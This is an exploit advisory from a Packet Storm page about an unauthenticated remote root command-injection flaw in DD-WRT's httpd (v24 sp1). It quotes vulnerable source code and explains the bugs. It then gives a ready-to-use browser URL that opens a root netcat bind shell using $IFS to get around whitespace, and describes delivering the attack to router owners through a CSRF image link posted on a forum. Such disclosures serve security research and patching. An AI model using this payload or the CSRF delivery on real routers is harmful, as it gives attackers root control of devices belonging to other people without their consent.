exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

DD-WRT Remote Root

DD-WRT Remote Root
Posted Jul 21, 2009
Authored by gat3way

The DD-WRT httpd service suffers from a remote code execution vulnerability allowing for root-level compromise.

tags | exploit, remote, root, code execution
SHA-256 | 4fa108e4543009094952548a9199d667cecac3c9c871c59b3e9b52bb465387be

DD-WRT Remote Root

Change Mirror Download
-----------------------------------------------------------------------------------------


A remote root vulnerability in the DD-WRT's httpd service. The bug exists
in the latest 24 sp1 version of the firmware.

The problem is due to a number of bugs and bad software design decisions. Here
is part of httpd.c:

859             if (containsstring(file, "cgi-bin")) {
860     
861                     auth_fail = 0;
862                     if (!do_auth
863                         (conn_fp, auth_userid, auth_passwd, auth_realm,
864                          authorization, auth_check))
865                             auth_fail = 1;


......... (snip)............

899     
900                     }
901                     exec = fopen("/tmp/exec.tmp", "wb");
902                     fprintf(exec, "export REQUEST_METHOD=\"%s\"\n",
method);
903                     if (query)
904                             fprintf(exec, "/bin/sh %s/%s</tmp/exec.query\n",
905                                     server_dir != NULL ?
server_dir : "/www",file);
906                     else
907                             fprintf(exec, "/%s/%s\n",
908                                     server_dir != NULL ?
server_dir : "/www",
file);
909                     fclose(exec);
910     
911                     if (query) {
912                             exec = fopen("/tmp/exec.query", "wb");
913                             fprintf(exec, "%s\n", query);

........................
Two issues there:
1) No metacharacters handling
2) Command gets executed even without successful authentication.
You are not going to see any output if not authenticated though.
.......................

914                             free(query);
915                             fclose(exec);
916                     }
917     
918                     system2("chmod 700 /tmp/exec.tmp");
919                     system2("/tmp/exec.tmp>/tmp/shellout.asp");

........... (snip)..........

926                     if (auth_fail == 1) {
927                             send_authenticate(auth_realm);
928                             auth_fail = 0;

------------

3) issue 3: httpd runs as root :)



Now let's sum up (1), (2) and (3). Any unauthenticated attacker that can
connect to the management web interface can get easily root on the device via
his browser with an URL like:

 http://routerIP/cgi-bin/;command_to_execute

There is a catch though: whitespaces break it. Anyway, they can be easily
replaced with shell variable like $IFS. So, getting root shell at 5555/tcp
becomes as easy as typing this in your browser's url bar:

http://routerIP/cgi-bin/;nc$IFS-l$IFS-p$IFS\5555$IFS-e$IFS/bin/sh


Voila (pretty old-school, eheh). Here is some (poor) video demonstrating the
problem:
http://www.youtube.com/watch?v=UhDcXCVFrvM


Fortunately, httpd by default does not listen on the outbound interface.
However, this vulnerability can be exploited via a CSRF attack (the dd-wrt
device's owner does not even need to have an authenticated session on the web
UI which is bad, bad). However, a base authentication dialog will appear. In
IE even this can be supressed, see this one:

http://ha.ckers.org/blog/20090630/csrf-and-ignoring-basicdigest-auth/

Unlike the already documented CSRF vulnerability (
http://www.securityfocus.com/bid/32703 ) this DOES NOT need an authenticated
session. This means someone can even post some crafted [img] link on a forum
and a dd-wrt router owner visiting the forum will get owned :)


A weird vulnerability you're unlikely to see in 2009 :) Quite embarrassing I
would say :)


Thanks krassyo at krassyo.info for his support :)


Leka vecher :)
Login or Register to add favorites

File Archive:

September 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    261 Files
  • 2
    Sep 2nd
    17 Files
  • 3
    Sep 3rd
    38 Files
  • 4
    Sep 4th
    52 Files
  • 5
    Sep 5th
    23 Files
  • 6
    Sep 6th
    27 Files
  • 7
    Sep 7th
    0 Files
  • 8
    Sep 8th
    1 Files
  • 9
    Sep 9th
    16 Files
  • 10
    Sep 10th
    38 Files
  • 11
    Sep 11th
    21 Files
  • 12
    Sep 12th
    40 Files
  • 13
    Sep 13th
    18 Files
  • 14
    Sep 14th
    0 Files
  • 15
    Sep 15th
    0 Files
  • 16
    Sep 16th
    21 Files
  • 17
    Sep 17th
    51 Files
  • 18
    Sep 18th
    23 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close